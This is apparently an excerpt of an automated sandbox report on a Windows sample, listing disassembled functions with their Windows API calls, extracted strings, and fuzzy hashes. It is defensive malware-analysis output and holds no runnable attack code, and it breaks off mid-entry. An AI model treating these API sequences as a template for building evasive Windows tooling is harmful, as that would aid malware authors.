                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                    • API String ID: 1976180769-4113822522
                                                    • Opcode ID: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                    • Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
                                                    • Opcode Fuzzy Hash: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                    • Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                                                    • String ID:
                                                    • API String ID: 461458858-0
                                                    • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                    • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
                                                    • Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                    • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                                                    APIs
                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                                                    • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                                                    • GlobalLock.KERNEL32(00000000), ref: 004300F6
                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                                                    • CloseHandle.KERNEL32(00000000), ref: 00430113
                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                                                    • GlobalFree.KERNEL32(00000000), ref: 00430150
                                                    • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                                                    • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                                                    • DeleteObject.GDI32(?), ref: 004301D0
                                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                    • String ID:
                                                    • API String ID: 3969911579-0
                                                    • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                    • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                                                    • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                    • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                                                    • String ID: 0
                                                    • API String ID: 956284711-4108050209
                                                    • Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                    • Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
                                                    • Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                    • Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                    • String ID: 0.0.0.0
                                                    • API String ID: 1965227024-3771769585
                                                    • Opcode ID: 7f5a35a4caea2a0363244511447d860b497c1f3f6669415181c210b9a0992ba1
                                                    • Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
                                                    • Opcode Fuzzy Hash: 7f5a35a4caea2a0363244511447d860b497c1f3f6669415181c210b9a0992ba1
                                                    • Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
                                                    APIs
                                                      • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                      • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
                                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
                                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
                                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
                                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: SendString$_memmove_wcslen
                                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                    • API String ID: 369157077-1007645807
                                                    • Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                    • Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
                                                    • Opcode Fuzzy Hash: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                    • Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
                                                    APIs
                                                    • GetParent.USER32 ref: 00445BF8
                                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
                                                    • __wcsicoll.LIBCMT ref: 00445C33
                                                    • __wcsicoll.LIBCMT ref: 00445C4F
                                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: __wcsicoll$ClassMessageNameParentSend
                                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                    • API String ID: 3125838495-3381328864
                                                    • Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                    • Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
                                                    • Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                    • Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
                                                    APIs
                                                    • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                                                    • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                                                    • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                                                    • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                                                    • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                                                    • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                                                    • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                                                    • SendMessageW.USER32(?,00000402,?), ref: 00449399
                                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$CharNext
                                                    • String ID:
                                                    • API String ID: 1350042424-0
                                                    • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                    • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
                                                    • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                    • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
                                                    APIs
                                                      • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                      • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                    • GetDriveTypeW.KERNEL32(?), ref: 004787B9
                                                    • _wcscpy.LIBCMT ref: 004787E5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                                    • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
                                                    • API String ID: 3052893215-2127371420
                                                    • Opcode ID: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                    • Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
                                                    • Opcode Fuzzy Hash: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                    • Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
                                                    APIs
                                                    • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                    • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                                                    • __swprintf.LIBCMT ref: 0045E7F7
                                                    • _wprintf.LIBCMT ref: 0045E8B3
                                                    • _wprintf.LIBCMT ref: 0045E8D7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                    • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                    • API String ID: 2295938435-2354261254
                                                    • Opcode ID: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                    • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
                                                    • Opcode Fuzzy Hash: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                    • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: __swprintf_wcscpy$__i64tow__itow
                                                    • String ID: %.15g$0x%p$False$True
                                                    • API String ID: 3038501623-2263619337
                                                    • Opcode ID: 590827ce7b77b8aad8d77ae30f890fa54b52bbd446dfbd0357f9fd69017812b4
                                                    • Instruction ID: fd507a47f7d2c8f7f5848ea17d112ce969af4838d766d220e6d3988dad71e25c
                                                    • Opcode Fuzzy Hash: 590827ce7b77b8aad8d77ae30f890fa54b52bbd446dfbd0357f9fd69017812b4
                                                    • Instruction Fuzzy Hash: 264108729001005BDB10EF75DC42FAAB364EF55306F0445ABFE09CB242EA39DA48C79A
                                                    APIs
                                                    • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                    • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                                                    • __swprintf.LIBCMT ref: 0045E5F6
                                                    • _wprintf.LIBCMT ref: 0045E6A3
                                                    • _wprintf.LIBCMT ref: 0045E6C7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                    • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                    • API String ID: 2295938435-8599901
                                                    • Opcode ID: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                    • Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
                                                    • Opcode Fuzzy Hash: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                    • Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
                                                    APIs
                                                    • timeGetTime.WINMM ref: 00443B67
                                                      • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                                                    • Sleep.KERNEL32(0000000A), ref: 00443B9F
                                                    • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00443BC8
                                                    • SetActiveWindow.USER32(?), ref: 00443BEC
                                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
                                                    • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00443C22
                                                    • Sleep.KERNEL32(000000FA), ref: 00443C2D
                                                    • IsWindow.USER32(?), ref: 00443C3A
                                                    • EndDialog.USER32(?,00000000), ref: 00443C4C
                                                      • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                      • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                      • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                    • EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                                                    • String ID: BUTTON
                                                    • API String ID: 1834419854-3405671355
                                                    • Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                    • Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
                                                    • Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                    • Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                                                    • LoadStringW.USER32(00000000), ref: 00454040
                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                    • _wprintf.LIBCMT ref: 00454074
                                                    • __swprintf.LIBCMT ref: 004540A3
                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                                                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                    • API String ID: 455036304-4153970271
                                                    • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                    • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
